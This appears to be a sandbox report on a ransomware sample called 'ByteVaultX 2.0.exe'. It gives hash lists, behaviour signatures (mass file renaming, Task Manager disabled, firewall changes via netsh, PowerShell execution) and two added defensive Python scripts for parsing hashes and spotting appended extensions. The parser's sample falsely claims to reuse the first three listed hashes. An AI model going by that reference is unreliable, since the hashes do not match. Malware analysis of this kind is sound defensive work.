MD5 d5bfa8bfa4724309248f8219e3501e84
SHA1 dcdf5cd53a02d97515985215ad46a36feb37167b
SHA256 6f6147c1ea4009c4c19a07b05e43792bdacc48226db2fa3de5189725cdd4964a
SHA512 5c3b486b4c4d715009ff362c33c7b268ee59b9f674217ffef82aa4c704afa6bea14e048f47b095aa62c11d016533d72e89076261068cb793c9a9737b48bef304

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 dbed6207e0d3208bd0ee26b6c99307e3
SHA1 facbc3806e7596b021efd6a475cd407058223703
SHA256 631632aac60e6815fb18144cce66425db89b75c1e9d2c4af46d9d5148b6f5f72
SHA512 a0fbe5b0d32f20ffe23aebf00b77d41159ed7c01b2302efa6e6a0cc61e4c008538f44d2cf8c7ab6c062317d1c5762eebedf0d9a06a7fdde112d231f0a27fff8e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 cad6ee71e2f46608490520923ec5d2ff
SHA1 e975523ab16e08c69c671db25eb18a17ebeddeae
SHA256 a844aef1c1a30f44b01052bc36aa683e0f5a62b1b98bd4db09350630a223a753
SHA512 5fcd17d2ea19c1882d20471a2b9ae35eb0e46f3a34346447ce0f29ce193cc52d61fc77c5998e47c3a82c00cd6445a45a3083aa041c9b247397fce79ebeda9163

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d9f57d6c4214f890e8c0b575404864dc
SHA1 017f9174a12ca9632ffdf6b4316c88e02800777a
SHA256 3d51900ed720bd3f98cfc27c5a268eaa93b2ae4a40202fcc8240e26d1a3eac8f
SHA512 bec0064af11dd33ba51e4e6271633b3d9143d9e6b99290bc84da066c74eff297dc92071cb56c377739a3ece3e19c780e4591cde667bf8d4aa73eb4797630d042

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 53baceafe29eabe8b3af161873ec4af4
SHA1 0aa7a23375ea68302e8cdc0ca8fa020a56b4e74c
SHA256 cd12c5808bd48708772c5cc0b53c07941b643c8115bb8042b30ab96a1ceb61c8
SHA512 4166d67c20f6e7ad2843af73735a42391c2651dd8379cac74b4c09963e592dc475613dcd90280735b55ecdda6a2086c5d5d50b07616d9111a609de48b7fad296

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8082885362359f72fb414d2fa6ad357d
SHA1 c6111820bcf1adf9ac4e8a441d984790465b6393
SHA256 0b70605985f4148a236426049c44406110e9edc165a0501f636015a30340beef
SHA512 b5d227b5ac6549566d7456616b98fe9aa62f6721be43a9e5674c35c2c9d218f7fec0fea978bdaff3ec73b6591c6e41efa8946526c2ab473da1c443a5a851a145

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 26ad1dd847804426ae0a367a11a44d79
SHA1 a0f2cd8bc120f011850551f290776f151f3f383d
SHA256 8f4448620d837d22091c970d23ea4975c79dadff76387fa1b6b84b0e5ea65791
SHA512 2b2c7c7f0c943565c424aa1567ac2c396485674872698600f372e6c8a4a6d54d1b64bdf5f8c9f97b28d39be39baedfeb7ff6f6661a68ffc8f6891596eae167ba

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 051a74485331f9d9f5014e58ec71566c
SHA1 4ed0256a84f2e95609a0b4d5c249bca624db8fe4
SHA256 3f67e4ba795fd89d33e9a1fe7547e297a82ae50b8f25eedc2b33a27866b28888
SHA512 1f15fd8ca727b198495ef826002c1cbcc63e98eecb2e92abff48354ae668e6c3aaf9bd3005664967ae75637bacee7e730ce36142483d08ae6a068d9ae3e0e17d

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 906523560f8af295fe0b398799658002
SHA1 b6b3d1f077ae0c39ac71d138630744856c0e424d
SHA256 9f1750afbd8fd87ce27d8ecb32a9dfc9247ca360055a34fb25780c3685995ced
SHA512 4dacd67d05b3648ce9ec59833aeca1c4683e25a8c0ab13297bede5168487e3c9a0608b9c93bb4e3baa2bd3a5414672f62c55b7386813d814e2cb44cd926f566b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 cc2210f652fff7eb769ceac982678f09
SHA1 dc1eebc04c9fc5dbfc05b80340ada3c63e16178e
SHA256 8fd1a8119831b8aec9d809642505b154c6ad3a6920a7bf7c8028e369da5978c5
SHA512 38db3e814c4e67f79938574d4d7b73248c61011dca46d2c77615aa1682fddf0554f41eef2097c4149ad4dee41b53db9c654901d001fc6f674d0a7c3ef5f58303

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 050567a067ffea4eb40fe2eefebdc1ee
SHA1 6e1fb2c7a7976e0724c532449e97722787a00fec
SHA256 3952d5b543e5cb0cb84014f4ad9f5f1b7166f592d28640cbc3d914d0e6f41d2e
SHA512 341ad71ef7e850b10e229666312e4bca87a0ed9fe25ba4b0ab65661d5a0efa855db0592153106da07134d8fc2c6c0e44709bf38183c9a574a1fa543189971259

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9dd876d6004f9e894c7d8de6ae950e5b
SHA1 48f0b4c5f0203788acdeceee62a69df0022dc8d4
SHA256 6e19ea46b5d0c9d58c6fc3c6187e5b821f1600cc25d675d25c8fd829f7194344
SHA512 3f5be2cb27900546eb791f5d5f1274c787f9a4645647b9943a5502c2167ec8a5d9ab653f2efc088d6ea6e8057b63caf3dce0a376f0b88d62f43b68bfa1518324

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 bda95964af6686f13b722b5afc511019
SHA1 a61077c1cf551bfb18bd4aa58a50fd127897c8fd
SHA256 fea4fcf87c1ba433a7c5a078733f65b837c20cc105c5b7125ba5f55ee65b49c7
SHA512 a44e2078f2486d3805e01d2eab93f750f2035a3c3e8f2deb3946470ecf42c06c8fdaa2b04ad8d2941ed33a6cd68f0ed75b47fd1dd650129dc047daa299bced47

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 947f5aa506644a452dd41f1c18ea6103
SHA1 d26a04fd395c97e0028a46aaabf2a4e6767dce75
SHA256 69428140330e639719076b30ff37512ccb9202ba7013c0ad7b938ac95c4aeabd
SHA512 6b61b9d7936cd3e7eef324c79f021af7400c850ed3312c5c444d0a08c6476d7b7bc3730edf96fe749c0f18464c0cf3624a1f80abaf69cb564b231fdc6527d698

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 20605e5defd408aff02f2484a1d37a15
SHA1 a49153d3c57a47b0b2abc0494d1dcad58cbe9dd0
SHA256 7d79e0c7274361b45ee2eaa1838022c72f83b864288f67b9033669eb2ae04b89
SHA512 9873c143675025c76afbc5e54b8b962de2500e5f52d1c96ce7a5a8a574ba2e56b8a8e11715b1950e1d8ec3f677956ef9990899ac3457b8517eaac39a41d5bc4a

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d9734cb5b55bf5df8ff11687c32e7df6
SHA1 080ee90218af5791480cb07a24888f1d840c85a6
SHA256 1415cf5ca423ebccc6bad8c50c8fc990aab0499dcbf9a0ed415b13a398dd0f4d
SHA512 2426314730805cd837a5ae8ef325e184663fe1a1a622870380302278b53e95eef65ca68b6c4884e6ba1c34f10f1070c89294f5f561cce7c84b7ea89c6984695b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 38438a4316012154ae9ae948bfe7dd30
SHA1 3720f72b120583f8495c34c2d309bf1a8331783f
SHA256 b44274f6006964771bfc9482e419aab5fcd54f097086215aebe6be291d883a55
SHA512 44c0a937a10b51bbd20cf7785bc377d65a17068eb00c94ac0a3498392fc2bfd4afe3b2ae00fbb8cf699d429aca9957c414b5fbdcf4ebc2a9124007818ed41bd3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 13f220b32225fc4bdc00160f199d264a
SHA1 b1e1b31ec6b2d1f22793b3490eb905252d6a6f1a
SHA256 69cbec7c741e79dbbf1c8ab1046eb8edd0585f7ad56432e9a341114ec51b4c2a
SHA512 f7a0074ff42f81c4eac7815c16b29a902ac933e8367698678e05582d6b6d237a20f1b282451d4112085e4479e179cb54960831d459c91109168363cb9276c782

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 77f69b27d0f1410e425839bd504d948f
SHA1 812d76f81bfcad255062466dc7f605ab34a63138
SHA256 b7230c73b85ac75d9b1e0a28c4291e31eeebabcc8c713cea8fc1abe47b200fde
SHA512 40bbf3d9923f6abffd144e3ce6ad38e826775c26fb2651ccde5794cdac4a4f0aaa73b261c503ad2406ecc4fd653220f2900a377b3126e2b14c84071dc8d11085

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 30d64d473d1e0b8497b7e248f497af06
SHA1 53781fa956a1dfcf1f0e1705b396ae94c6341071
SHA256 914381795efc09819ba2cd896d44755044c518054e880bd1f4eabea94005103a
SHA512 1e89c2ebf26c57f6bc73219ad8428b2e18be654756c3f34d0f605f37c19a5edad7fd0c27b22667e4702f80777f03346fbe9cdc126d901c802a9424656dd8664d

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 981885dcbb81d31ef4652aaf4ab6e17a
SHA1 c0447bc83f1a476cffec182ed9c7746cbfe8d2a7
SHA256 c20a8b4aa5e3be9af035057a9b4386445ee1d83fe9fa36080df037bb6f762a13
SHA512 8c0b5db1b8c4b760c25b19ab0de3657bfb640babfabe400fb1462a3193d5b6d59dadeb8c97535f0dda6954717f90ff44451d273465ae13acc043d5dc83d707a0

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e354695a664678a6d6ac3b7d92c553ea
SHA1 13d038a6a9ca1f5c2f4ed234cd78adedfe2a2a30
SHA256 c21a61526ab6902dc615a88c6319c626ca123626a10477e384145b7e5140201c
SHA512 929e2f18d44f4e393d1da77ff3c8f95cddb83bb290a79f46b77e51d820e1f9adae4feaf62470384ea7c736d662ad73389b268d3ac64b72d39804921c55c632e8

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1189a72e42e2321edf1ed3a8d5568687
SHA1 a2142fc754d6830de107d9d46f398483156f16a6
SHA256 009aee0a5f2d25ed79160e75cde58722def11663334ed20283e3afca32f971ea
SHA512 b1eb9b7aa7a57d0acec93b8152229b1f274a8d1b8f19133513486587f39b0636a9df89ddc6c2013e001d831f2b23cd0bb0fc084131824ea8e1dff134cd6d4f29

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3da987a7d5d8e16626e0a3ce65f3e920
SHA1 2694a4fd9d2cc3c6048b5870f4ef9063e1b4a181
SHA256 97c482c6b4f613c455beb14d3198e4e3ef896ed9a67b2d7422ae000e442b433c
SHA512 6e80ec5f97eb09b28ba814945297687f70192dbe792b2a3dfe8cdd587361a63c83f215bd7c84fa8b573d2578e7e6bfe0c69d2a888044ad1cf8f55020b023aea9

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5704afdde579f07e76e23103b1754102
SHA1 f7a5dd2cf5eaeacfd9c843e5a76114dd1c8b7a7b
SHA256 0cf2b0a35a4e3d3c2805d3dba68d047c18fa02945b12e3433b1426d54a2866ca
SHA512 bdf94e16965ebfe158ae5521c7e3d8fce3e0b42c4f7f67aa285decb8d5f115df762c075090d2c8ae0ab44fb809e7c93dae49f5a7c9bd7535ac2b50d5f922c232

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 09d02e85f682166b20fdf2f19bd61a4d
SHA1 646c890d839a9a88ed87550086a8568d6683d363
SHA256 f37127ca89d9b0346631e0617f0cc0a109d6c0c3ca482496d166338c3a0cdaaf
SHA512 c0f3de56491cd4a004a40729e9446a07f2039c5f78fddb4634e31724569da959273c0e4e64401d5d6bb92c192100a55ae6735e2cf6e750d9fc1fa0f0b0e069c9
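
The entries above share one path but carry distinct hashes: StartupProfileData-NonInteractive is the profile cache PowerShell writes when it starts, so a run of entries like this reflects repeated non-interactive powershell.exe launches rather than dozens of separate payloads, and the SHA256 values are still what a hunt or blocklist would consume. The parser below is an added example, not part of the report or the sandbox's own tooling. It reads the report's "Files" layout (a path line, then one hash line per algorithm), validates digest lengths so a truncated copy never lands in a blocklist, and groups entries per path. The sample text is a constructed three-entry excerpt using the first three hash sets listed above.

```python
import re
from collections import defaultdict

# Constructed excerpt in the report's "Files" layout; the hashes are the first
# three entries for StartupProfileData-NonInteractive listed in the report.
SAMPLE_FILES_BLOCK = r"""
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6f0e62045515b66d0a0105abc22dbf19
SHA1 894d685122f3f3c9a3457df2f0b12b0e851b394c
SHA256 529811e4d3496c559f3bd92cd877b93b719c3ac4834202aa76ab9e16e25f9319
SHA512 f78426df6032ee77f8c463446ab1c6bb4669ef7a2463dead831ec4ff83a07d7dc702d79372d8bcaf4594bf0fb6e11e9f027f3e0325de9b19be5f51b7b80ed54a

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 34c8b93dd58a4703db0d6dd86bb21d70
SHA1 b53aa49b882070b857951b6638d6da3a03ac2f56
SHA256 34b95e4d12196f68f7a030b98190fda89c34b696251ab9ed831e48d983896898
SHA512 bba4a86b8a66104ed21fd58717168cdf68b93c801a94ec65e25c2b66c1b9354b9e7c1c01cadde451948e072d96c3fa4994c94ef33aeff9b603e7b5d82f7111e7

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 de72a228bcabf1530b028259a45904a8
SHA1 8f584cd6b0e728a72e8fea86aeed8c308a80c95e
SHA256 3aa6fc7f1a9f4947c43dd2a3533a4db67bc89774b9eaa4f31279a1ff223b4411
SHA512 762d5ff80a9fe0c2361d5a50a65b4625ca30a65fefeda8a52c7dd41a79162e3fe6f8623808730d07fe1b199e514b9fe3937926891beb5113119469d4fcd3e4a2
"""

# Expected hex-digest lengths per algorithm; anything else is a copy error.
DIGEST_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
HASH_LINE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9A-Fa-f]+)$")
PATH_LINE = re.compile(r"^[A-Za-z]:\\")


def parse_files_block(text):
    """Parse the 'Files' layout into [{'path': str, 'hashes': {algo: hex}}].

    A drive-letter path line opens a new entry; hash lines attach to the most
    recent entry; blank lines are separators and are skipped.
    """
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if PATH_LINE.match(line):
            entries.append({"path": line, "hashes": {}})
            continue
        m = HASH_LINE.match(line)
        if m and entries:
            algo, digest = m.group(1), m.group(2).lower()
            entries[-1]["hashes"][algo] = digest
    return entries


def check_entry(entry):
    """Return a list of problems for one entry (empty when it is well-formed)."""
    problems = []
    for algo, digest in entry["hashes"].items():
        if len(digest) != DIGEST_LEN[algo]:
            problems.append(f"{algo} has {len(digest)} hex chars, expected {DIGEST_LEN[algo]}")
    if "SHA256" not in entry["hashes"]:
        problems.append("no SHA256 digest")
    return problems


def summarize_by_path(entries):
    """Group by path: how often it appears and the distinct SHA256 values seen."""
    summary = defaultdict(lambda: {"count": 0, "sha256": set()})
    for e in entries:
        s = summary[e["path"]]
        s["count"] += 1
        if "SHA256" in e["hashes"]:
            s["sha256"].add(e["hashes"]["SHA256"])
    return dict(summary)


if __name__ == "__main__":
    ents = parse_files_block(SAMPLE_FILES_BLOCK)
    for e in ents:
        for p in check_entry(e):
            print(f"WARN {e['path']}: {p}")
    for path, s in summarize_by_path(ents).items():
        print(f"{s['count']:3d}x, {len(s['sha256'])} distinct SHA256: {path}")
```

Run it against the full "Files" block of a report to get one line per dropped path with its entry count and distinct-hash count; paths that recur with many distinct hashes are cache or log files regenerated per run, while a single path with one hash is the kind of dropped artifact worth hashing into a blocklist.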

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-25 23:42

Reported

2024-05-26 00:00

Platform

win10-20240404-en

Max time kernel

931s

Max time network

1035s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"

Signatures

Renames multiple (132) files with added filename extension

ransomware

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Disables Task Manager via registry modification

evasion

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\SYSTEM32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
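
The "Renames multiple (132) files with added filename extension" signature and the desktop.ini modifications across Desktop, Documents, Pictures, Music, Videos and Downloads are the file-system side of an encryptor walking the user profile. On a live host the first question is which suffix was appended and how many files carry it. The scanner below is an added example, not code from the report or the sample; it walks a tree, collects files whose name carries an extra trailing extension, skips legitimate compound extensions such as .tar.gz so they do not inflate the count, and picks the suffix that covers many files of several original types. The report does not name the extension this sample uses, so the .xyz suffix and the whole sample tree are constructed test data.

```python
import tempfile
from collections import Counter, defaultdict
from pathlib import Path

# Final suffixes that legitimately follow another extension; without this
# allowlist every .tar.gz and .docx.lnk in the tree would look encrypted.
COMPOUND_OK = {".gz", ".bz2", ".xz", ".zst", ".lnk"}


def scan_appended_extensions(root):
    """Walk root and group files that carry an extra trailing extension.

    Returns (by_suffix, files): by_suffix maps the added suffix to a Counter of
    the original extensions found beneath it; files maps the suffix to paths.
    """
    by_suffix = defaultdict(Counter)
    files = defaultdict(list)
    for path in Path(root).rglob("*"):
        if not path.is_file():
            continue
        suffixes = path.suffixes
        if len(suffixes) < 2:          # plain notes.txt or desktop.ini
            continue
        added, original = suffixes[-1].lower(), suffixes[-2].lower()
        if added in COMPOUND_OK:
            continue
        by_suffix[added][original] += 1
        files[added].append(str(path))
    return dict(by_suffix), dict(files)


def likely_ransom_suffix(by_suffix, min_files=10, min_distinct_originals=2):
    """Return (suffix, total) for the added suffix that dominates, or None.

    One suffix appended to many .docx/.xlsx/.jpg files is the pattern behind a
    'renames multiple files with added filename extension' signature; a couple
    of .bak copies of one file type is not.
    """
    best = None
    for suffix, originals in by_suffix.items():
        total = sum(originals.values())
        if total >= min_files and len(originals) >= min_distinct_originals:
            if best is None or total > best[1]:
                best = (suffix, total)
    return best


def build_sample_tree():
    """Create a throwaway profile-like tree (constructed data, not from the report)."""
    root = tempfile.mkdtemp(prefix="profile_")
    layout = {
        "Documents": ["budget.xlsx.xyz", "thesis.docx.xyz", "notes.txt",
                      "old.pdf.bak", "desktop.ini"],
        "Pictures": ["holiday.jpg.xyz", "scan.png.xyz", "desktop.ini"],
        "Downloads": ["tools.tar.gz", "installer.msi", "report.docx.lnk"],
    }
    for folder, names in layout.items():
        d = Path(root, folder)
        d.mkdir()
        for name in names:
            (d / name).write_bytes(b"\x00" * 16)
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    by_suffix, files = scan_appended_extensions(root)
    for suffix, originals in by_suffix.items():
        print(f"{suffix}: {sum(originals.values())} files, originals {dict(originals)}")
    print("dominant added suffix:", likely_ransom_suffix(by_suffix, min_files=3))
```

Point it at the mounted profile of an affected host (or a forensic image) and raise min_files to something like the count the sandbox reported; the path list under the winning suffix doubles as the scope for restore-from-backup.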

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
